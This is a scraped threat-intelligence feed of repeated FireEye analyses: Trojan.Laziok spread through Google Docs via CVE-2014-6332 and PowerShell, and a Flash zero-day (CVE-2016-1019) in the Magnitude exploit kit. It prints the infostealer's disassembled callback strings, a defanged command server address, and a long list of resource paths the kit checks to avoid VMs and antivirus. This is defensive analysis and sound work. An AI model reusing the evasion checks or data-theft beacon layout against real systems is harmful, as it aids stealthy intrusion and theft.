\"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nAbove instructions of the payload, when unpacked, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and processes such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server [hxxp://]193.189.117[.]36]\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. \n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "cvss3": {}, "published": "2016-04-21T17:45:00", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2014-6332"], "modified": "2016-04-21T17:45:00", "id": "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean. cba[.]pl/lean/.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Laziok/Fig1.jpg)\n\nFigure 1. Obfuscated code shown in the response\n\nOnce decoded, the JavaScript unpacks and runs vulnerability CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11), exploiting the memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation to bypass operating system security utilities and other protections and thus enabling attackers to enter into \u201dGodMode\u201d function. CVE-2014-6332 usage, along with GodMode privileges abuse, has been used as a combination since late 2014 via a known PoC[ii], as seen Figures 2a and 2b:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Laziok/Fig2a.jpg)\n\nFigure 2a. CVE-2014-6332 usage\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Laziok/Fig2b.jpg)\n\nFigure 2b. Function call to runmumaa() after \u201cGodMode\u201d access changing the safemode flags\n\nNext, the runmaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download malware and execute it inside defined %APPDATA% environment variable path via DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. We have previously discussed [active PowerShell data stealing campaigns from Russia](<mailto:https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Laziok/Fig3.jpg)\n\nFigure 3. Using PowerShell to fetch payload hosted on Google docs link\n\n##### **Payload Details**\n\nThe downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII \"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nAbove instructions of the payload, when unpacked, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and processes such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server [hxxp://]193.189.117[.]36]\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. \n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "edition": 2, "cvss3": {}, "published": "2016-04-21T13:45:00", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2012-0158"], "modified": "2016-04-21T13:45:00", "id": "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:19", "description": "On April 2, security researcher @Kafeine at Proofpoint [discovered a change to the Magnitude Exploit Kit](<https://www.proofpoint.com/us/threat-insight/post/killing-zero-day-in-the-egg>). Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).\n\nWhile version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovations into exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.\n\n##### Exploit Delivery Chain \n\n\nMagnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen\u2019s dimensions and color depth (Figure 1).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig1.jpg)\n\nFigure 1. JS of Profile Gate\n\nThe server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig2.jpg)\n\nFigure 2. JS of redirecting to main exploit page\n\nIn our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig3.jpg)\n\nFigure 3. JS of loading exploits\n\n##### The Flash Exploit\n\nA memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the flash memory allocator to allocate buffers under the attacker\u2019s control. The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit\u2019s code layout and some of the functionalities are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig4.jpg)\n\nFigure 4. ActionScript of Flash exploits\n\n##### Conclusion\n\nThis is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications \u2013 such as Internet Explorer/Edge and Flash Player \u2013 change the game.\n\nDespite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as [EMET](<https://support.microsoft.com/en-us/kb/2458544>) from Microsoft. \n \nClick [here](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) for the security bulletin issued by Adobe.\n\n##### Acknowledgements\n\nA huge thank you to @Kafeine, without whom this discovery would not be possible. His diligence continues to keep this industry at pace with exploit kit authors around the world.\n\n##### Appendix\n\nres://\\Program%20Files%20(x86)\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files%20(x86)\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files%20(x86)\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T08:30:00", "type": "fireeye", "title": "CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2015-2419"], "modified": "2016-04-07T08:30:00", "id": "FIREEYE:1A61A821CE69D378830204326B2E938C", "href": "https://www.fireeye.com/blog/threat-research/2016/04/cve-2016-1019_a_new.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:48", "description": "On April 2, security researcher @Kafeine at Proofpoint [discovered a change to the Magnitude Exploit Kit](<https://www.proofpoint.com/us/threat-insight/post/killing-zero-day-in-the-egg>). Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).\n\nWhile version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovations into exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.\n\n##### Exploit Delivery Chain \n\n\nMagnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen\u2019s dimensions and color depth (Figure 1).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig1.jpg)\n\nFigure 1. JS of Profile Gate\n\nThe server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig2.jpg)\n\nFigure 2. JS of redirecting to main exploit page\n\nIn our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig3.jpg)\n\nFigure 3. JS of loading exploits\n\n##### The Flash Exploit\n\nA memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the flash memory allocator to allocate buffers under the attacker\u2019s control. The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit\u2019s code layout and some of the functionalities are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Flash%200day%20Genwei%20Jang/fig4.jpg)\n\nFigure 4. ActionScript of Flash exploits\n\n##### Conclusion\n\nThis is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications \u2013 such as Internet Explorer/Edge and Flash Player \u2013 change the game.\n\nDespite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as [EMET](<https://support.microsoft.com/en-us/kb/2458544>) from Microsoft. \n \nClick [here](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) for the security bulletin issued by Adobe.\n\n##### Acknowledgements\n\nA huge thank you to @Kafeine, without whom this discovery would not be possible. His diligence continues to keep this industry at pace with exploit kit authors around the world.\n\n##### Appendix\n\nres://\\Program%20Files%20(x86)\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files%20(x86)\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files%20(x86)\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 